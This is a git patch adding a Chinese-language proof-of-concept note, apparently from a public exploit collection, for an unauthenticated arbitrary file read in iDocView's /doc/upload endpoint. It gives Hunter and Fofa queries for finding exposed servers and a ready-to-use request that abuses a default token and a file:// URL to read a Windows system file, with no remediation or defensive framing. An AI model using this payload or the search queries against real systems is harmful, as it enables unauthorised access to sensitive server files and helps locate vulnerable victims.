From 69209f161ab97d84251a6a20ab2373aac769ac12 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 15 Dec 2023 12:50:21 +0800
Subject: [PATCH] =?UTF-8?q?Create=20iDocView=20upload=E6=8E=A5=E5=8F=A3?=
 =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 iDocView upload接口任意文件读取.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 iDocView upload接口任意文件读取.md

diff --git a/iDocView upload接口任意文件读取.md b/iDocView upload接口任意文件读取.md
new file mode 100644
index 0000000..2d63cba
--- /dev/null
+++ b/iDocView upload接口任意文件读取.md	
@@ -0,0 +1,18 @@
+## iDocView upload接口任意文件读取
+ iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞，未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息，使系统处于极度不安全的状态。 
+
+## 资产测绘
+```
+Hunter语法：
+app.name="I Doc View"
+Fofa语法：
+title="I Doc View"
+```
+
+## poc
+```
+http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt
+```
+![image](https://github.com/wy876/POC/assets/139549762/01f5a3a7-9cd3-45bc-beb0-5cd6ab800171)
+
+![image](https://github.com/wy876/POC/assets/139549762/0e549cdd-9c98-41b5-874d-8a159cf3db19)